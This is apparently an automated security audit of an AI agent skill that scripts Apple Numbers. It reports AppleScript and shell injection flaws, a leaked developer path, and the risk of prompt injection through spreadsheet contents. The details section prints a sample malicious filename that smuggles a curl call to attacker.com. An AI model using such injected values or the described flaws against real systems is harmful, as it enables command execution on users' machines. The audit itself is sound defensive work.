automating-numbers
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): AppleScript Injection vulnerability in multiple Python scripts.
- Evidence:
scripts/create_numbers_spreadsheet.py,scripts/export_numbers_to_csv.py, andscripts/read_numbers_spreadsheet.pyuse f-strings to construct AppleScript strings executed viaosascript. - Details: User-provided variables like
save_path,input_file, andfile_pathare resolved usingPath.resolve()but are not escaped for double quotes. An attacker providing a filename such astest.numbers" & (do shell script "curl http://attacker.com/ex") & "` could execute arbitrary shell commands on the host. - [COMMAND_EXECUTION] (HIGH): Shell Injection in JXA script.
- Evidence:
scripts/create_skills_spreadsheet.jsusesapp.doShellScriptwith template literals containing file paths retrieved from the system. - Details: The script iterates through file paths found via
findand interpolates them directly into astatcommand:app.doShellScript("stat -f%z '${filePath}'..."). If a file or directory name contains shell metacharacters (e.g., backticks or semicolons), it results in arbitrary command execution. - [DATA_EXFILTRATION] (LOW): Information exposure through hardcoded local paths.
- Evidence:
scripts/create_skills_spreadsheet.jshardcodes a specific absolute path:/Users/richardhightower/clients/spillwave/.... - Details: This exposes the local username and internal directory structure of the developer's environment to the agent and potentially to users of the skill.
- [INDIRECT_PROMPT_INJECTION] (LOW): Susceptibility to malicious content in processed data.
- Ingestion points:
scripts/read_numbers_spreadsheet.py(reads spreadsheet cell values) andscripts/create_skills_spreadsheet.js(reads file system metadata). - Boundary markers: Absent. There are no delimiters or instructions to the LLM to ignore instructions embedded within the spreadsheet data.
- Capability inventory: The skill has
Bash,Read, andWritepermissions, and can execute system-level automation via AppleScript and shell scripts. - Sanitization: None. Data is read from external files and processed or printed without escaping or validation.
Recommendations
- AI detected serious security threats
Audit Metadata